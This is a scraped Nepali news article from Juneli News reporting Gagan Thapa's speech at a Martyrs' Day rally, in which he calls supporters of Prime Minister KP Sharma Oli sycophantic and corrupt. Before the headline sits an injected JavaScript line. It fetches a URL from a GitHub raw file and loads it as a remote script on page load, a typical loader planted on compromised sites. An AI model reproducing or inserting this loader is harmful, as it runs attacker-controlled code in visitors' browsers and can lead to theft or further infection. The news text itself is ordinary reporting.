;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओलीका समर्थक सबै धुपाउरे भ्रष्टचारीहरु हुन् -गगन थापा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ओलीका समर्थक सबै धुपाउरे भ्रष्टचारीहरु हुन् -गगन थापा
ट्रेन्डिङ

ओलीका समर्थक सबै धुपाउरे भ्रष्टचारीहरु हुन् -गगन थापा

माघ १६,

काठमाडौं । नेपाली कांग्रेसका युवा नेता गगन थापाले प्रधानमन्त्री केपी शर्मा ओलीका समर्थकहरु उनको धुपाउरे भएको टिप्पणी गरेका छन् । संसद् पुःनस्थापनाको विकल्प नभएको उनको भनाई छ ।

शहिद दिवसको अवसरमा काठमाडौं क्षेत्र नं ६ को आयोजनामा भएको बिरोध सभालाई सम्बोधन गर्दै थापाले भने- केपी ओलीका समर्थक सबै धुपाउरे हुन्, उनले जनतालाई घात गर्न बाहेक अरु जानेका छैनन्, नेपाली जनतालाई धोका , भ्रष्टचारीलाई समर्थन्, गर्दै देशलाईनै अन्धकारको भुमरीमा हाले भन्ने उनको आरोप छ  ।

फेसबुक प्रतिक्रियाहरु